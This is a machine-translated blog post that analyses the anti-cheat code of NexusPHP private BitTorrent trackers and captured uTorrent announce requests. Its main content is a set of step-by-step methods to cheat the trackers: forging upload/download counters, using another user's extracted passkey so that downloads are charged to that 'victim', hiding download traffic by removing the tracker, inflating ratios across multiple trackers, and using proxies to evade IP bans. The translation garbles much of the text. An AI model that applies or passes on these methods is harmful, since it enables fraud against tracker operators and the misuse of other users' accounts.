Analysis and utilization of pt protocol vulnerabilities

0x00 background

PT is the abbreviation of PrivateTracker (Private seed server). It can collect statistics on user uploads and downloads.

User Sharing rate. You can simply understand it as an upgraded version of BT.

Only when the shared rate is set can the account not be deleted. PT is actually a type of Bt download, but there are two obvious improvements: first, private

Secret for small-scale download. Second, conduct traffic statistics and determine your permissions based on the upload volume. It is required to disable DHT.

Select and control the number of users, so that within a limited range, the downloaded users can basically achieve their own broadband

Limited, PT download is also implemented through the binding mechanism in the Forum and other ways, so that users can download

Upload during the process. (From Baidu encyclopedia)

Take the PT site registered by the author as an example. Since the PT protocol collects statistics on downloads and uploads, there is

The value of the upload ratio. The account level is related to the sharing rate, download volume, and upload volume. Sharing Rate

If it is too low, the block number and other consequences will occur. But is the PT protocol really reliable? Please refer to my analysis here. If the principle is not

If you are interested, Jump directly to 0x03.

0x01 Server Source Code Analysis

At present, most PT sites use nexusphp. The author uses nexusphp. v1.5.beta5.20120707

As an example.

Important data received by the server include passkey, info_hash, port, uploaded, downloaded,

Left, event. The next item is described as follows:

Passkey: uniquely identifies a user.

Info_hash: used to identify the unique value of the current resource

Port: the port connecting the client to the server

Uploaded: Number of uploaded files (unit: byte)

Downloaded: number of downloads (unit: byte)

Left: number of unfinished downloads (unit: byte)

Event: current status (important statuses include stopped, completed, and started)

The server inherits information such as data update and cheating detection, and the corresponding file is./announce. php.

First, let's look at the data update part. Corresponds to lines 231 to 316 of the file. After a series of verifications

Two lines of code:

$ USERUPDATESET [] = "uploaded = uploaded + $ upthis ";

$ USERUPDATESET [] = "downloaded = downloaded + $ truedownthis ";

Lines 3 of the file include:

SQL _query ("UPDATEusersSET". join (",", $ USERUPDATESET). "WHEREid =". $ userid );

After the users table is updated, the upload volume is changed to the sum of the original upload volume and the current upload volume, and the download volume is changed to the original download volume and

The sum of downloads.

Next we will look at the code of the cheating detection part.

The first authentication is USER_AGENT. See announce. php line 6th:

$ Agent = $ _ SERVER ["HTTP_USER_AGENT"];

Block_browser ();

For the block_browser function, see./include/functions_announce.php.

Functionblock_browser ()

{

$ Agent = $ _ SERVER ["HTTP_USER_AGENT"];

If (preg_match ("/^ Mozilla/", $ agent) | preg_match ("/^ Opera/", $ agent) |

Preg_match ("/^ Links/", $ agent) | preg_match ("/^ Lynx/", $ agent ))

Err ("Browseraccessblocked! ");

// Checkheaders

If (function_exists ('getallheaders') {// getallheaders () isonlysupported

WhenPHPisinstalledasanApachemodule

$ Headers = getallheaders ();

// Else

// $ Headers = emu_getallheaders ();

If ($ _ SERVER ["HTTPS"]! = "On ")

{

If (isset ($ headers ["Cookie"]) | isset ($ headers ["Accept-Language"]) |

Isset ($ headers ["Accept-Charset"])

Err ("Anti-Cheater: Youcannotusethisagent ");

}

}

}

The USER_AGENT of several common browsers is disabled, and the Cookie, Accept-Language,

Check the Accept-Charset items. If the HTTP request header contains cookies, Accept-Language,

Accept-Charset.

The second authentication is the port. See announce. php line 35th:

// Checkportandconnectable

If (portblacklisted ($ port ))

Err ("Port $ portisblacklisted .");

The tracking function portblacklisted, in./include/functions_announce.php, restricts the port

Range. However, the $ port variable is obtained through GET and can be forged.

Then, the identity information and seed information are obtained and verified, skipped. The server dynamically maintains the number of peers.

To record the current session information ).

Next is the third verification area, which verifies the announce interval. See announce. php line 163rd:

// Minannouncetime

If (isset ($ self) & $ self ['prevts']> (TIMENOW-$ announce_wait ))

Err ('thereisaminimumannouncetimeof '. $ announce_wait. 'seconds ');

$ Announce_wait is defined in row 100th, $ announce_wait

It can be less than 30 seconds. $ Self is the content in the peer table.

The fourth verification is in announce. php 219th and 220 rows:

= 30. That is, the announce interval is no.

$ Upthis = $ trueupthis = max (0, $ uploaded-$ self ["uploaded"]);

$ Downthis = $ truedownthis = max (0, $ downloaded-$ self ["downloaded"]);

$ Self ["uploaded"] and $ self ["downloaded"] are the content in the peer table, $ uploaded

And

$ Downloaded is the data obtained by GET on the server. The two rows are considered in the session of the current activity,

The values of $ uploaded and $ downloaded must be constantly increased.

Next is an important verification step, the check_cheater function. This function is in ./

Include/functions_announce.php.

Note writing in the check_cheater function is clear, essentially determining the upload speed under different circumstances. In the default

At the security level, if the upload speed is greater than 100 MByte/S, the system will automatically

Disable your account. Then, if you upload 1 GB at MByte/S speed, you may be cheating. If

If the administrator sets a higher security level, the current number of downloading peers is checked. If the number of downloading peers is large

If you upload at a high speed, you may cheat. Possible cheating situations, such

If the cheater table does not have your record within 24 hours, a new record will be added. If there is already a record, it will be recorded.

The number of hit will increase by 1.

This function only checks the upload-related parameters and does not check the download status. Therefore, we can forge downloads or

No downloads are generated.

The code for cheating detection is almost complete. Finally, let's look at the values related to the current status (event.

Stopped is equivalent to the status when you exit the client, stop downloading, stop seeding, and the system extracts your information from the peer table.

.

Completed indicates that the current seed has been downloaded. You can see it in the seed state. If Completed is not sent

It indicates that the file is still being downloaded or deleted, and the file is in the "unfinished" status.

 

0x02 client packet capture Verification

The author uses uTorrent3.1.3 for testing.

First, set a proxy in uTorrent to use brup to facilitate packet capture. We only need

Host name query uses a proxy to capture data packets when connecting to the server.

Download the seed and load it. The tracker list is displayed in the advanced options. The file corresponding to tracker is

 

The server script in 0x01.

Click OK to start downloading and use brup to capture packets.

The first package is sent to scrape. php In GET mode. The file determines whether the seed exists.

GET

/Scrape. php? Passkey = xxx & info_hash = % d5 % bb % 80% 2a % c3v % ac % 3d % 5e % 01% 90% 7fu % 9c % a4 % bc %

AfK7 % 81 & info_hash = % 12% 3f % PC3 % a5 % 8c5M % d7 % 9e % 1b % 40Q % cb % 2a % 14% bf % a7 % f09HTTP/1.1

Host: xxx

User-Agent: uTorrent/3130 (27385)

Accept-Encoding: gzip

Connection: Close

Then, the second packet is sent when the resource exists. The packet is sent to announce. php, that is, the server master script.

Future packets are sent to announce. php. The seed status is incomplete on the website.

GET

/Announce. php? Passkey = xxx & info_hash = % d5 % bb % 80% 2a % c3v % ac % 3d % 5e % 01% 90% 7fu % 9c % a4 % B

C % afK7 % 81 & peer_id =-UT3130-% f9j % b7J % 24% e6 % b9 % 85% 9a % d1zv & port = 41677 & uploaded = 0 & do

Wnloaded = 0 & left = 137201853.

& Corrupt = 0 & key = 03731F6C & event = started & numwant = 200 & compact = 1 & no_peer_id = 1 & ipv6 = x

XxxHTTP/1.1

Host: xxxx

User-Agent: uTorrent/3130 (27385)

Accept-Encoding: gzip

Connection: Close

From this package, we can see that the status event = started, uploaded = 0, downloaded = 0, left = 137201853.

Let's continue:

GET

/Announce. php? Passkey = xxx & info_hash = % d5 % bb % 80% 2a % c3v % ac % 3d % 5e % 01% 90% 7fu % 9c % a4 % B

C % afK7 % 81 & peer_id =-UT3130-% f9j % b7J % 24% e6 % b9 % 85% 9a % d1zv & port = 41677 & uploaded = 0 & do

Wnloaded = 52953088 & left = 83036349 & corrupt = 0 & key = 03731F6C & numwant = 200 & compact = 1 & no

_ Peer_id = 1 & ipv6-= xxxHTTP/1.1

Host: xxx

User-Agent: uTorrent/3130 (27385)

Accept-Encoding: gzip

Connection: Close

The upload and download information is available this time. Uploaded = 0, downloaded = 52953088, left = 83036349.

After the download is complete, I can see event = completed. The seed status is complete on the website.

GET

/Announce. php? Passkey = xxx & info_hash = % d5 % bb % 80% 2a % c3v % ac % 3d % 5e % 01% 90% 7fu % 9c % a4 % B

C % afK7 % 81 & peer_id =-UT3130-% f9j % b7J % 24% e6 % b9 % 85% 9a % d1zv & port = 41677 & uploaded = 0 & do

Wnloaded = 137201853 & left = 0 & corrupt = 0 & key = 03731F6C & event = completed & numwant = 200 & co

Mpact = 1 & no_peer_id = 1 & ipv6 = xxxHTTP/1.1

Host: xxx

User-Agent: uTorrent/3130 (27385)

Accept-Encoding: gzip

Connection: Close

When you exit the uTorrent client, the following packet is sent:

GET

/Announce. php? Passkey = xxx & info_hash = % d5 % bb % 80% 2a % c3v % ac % 3d % 5e % 01% 90% 7fu % 9c % a4 % B

C % afK7 % 81 & peer_id =-UT3130-% f9j % b7J % 24% e6 % b9 % 85% 9a % d1zv & port = 41677 & uploaded = 7438

336 & downloaded = 137201853 & left = 0 & 0000upt = 0 & key = 03731F6C & event = stopped & numwant = 0 &

Compact = 1 & not_peer_id = 1 HTTP/1.1

Host: xxx

User-Agent: uTorrent/3130 (27385)

Accept-Encoding: gzip

Connection: Close

I can see that event =

Stopped.

Let's look at these data packets again, which are characterized by the User-Agent

UTorrent/3130 (27385), no

Cookie, Accept-Language, Accept-Charset, and other information. This is the first verification on the server. Port

The value is within the range allowed by the server. This is the second verification. Compare the packet capture time and find the packet sending frequency before the download is complete

The package sending frequency is 30 minutes after the download is complete, that is, the tracker Update time. This guarantees

You can obtain sufficient peer resources at any time during the download, and the peer can not occupy too many server resources. The third verification was successful. The fourth and last verification are not described here because they cannot be intuitively viewed.

 

0x03PT protocol vulnerabilities and exploitation

After the above analysis, we can summarize the PT protocol vulnerabilities.

1. The client sends a GET request packet to complete the upload and download information. We can forge it;

2. PT only recognizes passkey. The algorithm used to generate passkey is MD5 (user name + time ).

+ Passhash ). Passkey exists in the downloaded seed. Although it cannot be forged, it can be extracted;

3. Cheating detection only involves the uploaded part, but does not detect the downloaded part, which may allow downloading and downloading;

4. A seed can contain multiple trackers, and the server does not or cannot detect the status.

When the tracker is updated, it will send the same upload download information to all the trackers in the list. In this way

Possible traffic flooding;

5. All information is processed by the tracker. When the database is queried multiple times, CC attacks may occur,

Once successful, the entire server will be unable to work.

The method to exploit the first vulnerability is to manually send data packets, as long as the preceding verification rules are met, that is

Pay attention to the current downloader's

Quantity. The number of current downloadable users can be queried on a specific page. The regular expression matches the information. Due to lack of talent

Not written using tools.

For the second vulnerability, we can ask an uninformed user for a downloaded seed and load it with uTorrent,

Click Advanced to view the tracker information and record its passkey. When you need to download the seeds and don't want to consume yourself in the future

When downloading, you can replace your own seed tracker with the victim's. In this way, when the tracker is updated

The information is the information of the victim, which is included in the downloads of the victim. After the download is complete, restart uTorrent and

Clear the upload information, and change the tracker to your own tracker, so that the upload volume is included in your account.

For the third vulnerability, we can delete the tracker after the tracker updates the peer at the beginning of the download,

In this way, the peer sends the file to itself, and does not send traffic information to the server. After the download is complete, restart

UTorrent: Add tracker to upload, And the upload volume is included in your account. (Use with caution. When the security level is high

Can lead to other people's titles !)

For the fourth vulnerability, the premise is that there are multiple friends or one sister. After downloading a seed in various ways,

Restart uTorrent, add the tracker of the current user and the other user to the tracker list, one person will do the kind, and more people will get it.

Data transfer.

For the fifth vulnerability, it is not explained that CC attacks are illegal.

 

0x04 postscript

This vulnerability has been detected for a long time and has not been described in detail. After all, the idea of cheating is in conflict with the spirit of sharing.

During this period, I also tried several times, one of which showed off excessively, resulting in banned ip addresses under my account. And then keep a low profile.

Development: Use a proxy to break through the ip address restrictions and silently download and upload resources. If there are no special circumstances, I hope you can

Follow the PT rules normally and enjoy yourself in sharing.

The above method is only used by the Research Institute. If a problem occurs, the consequences are at your own risk. It has nothing to do with the author.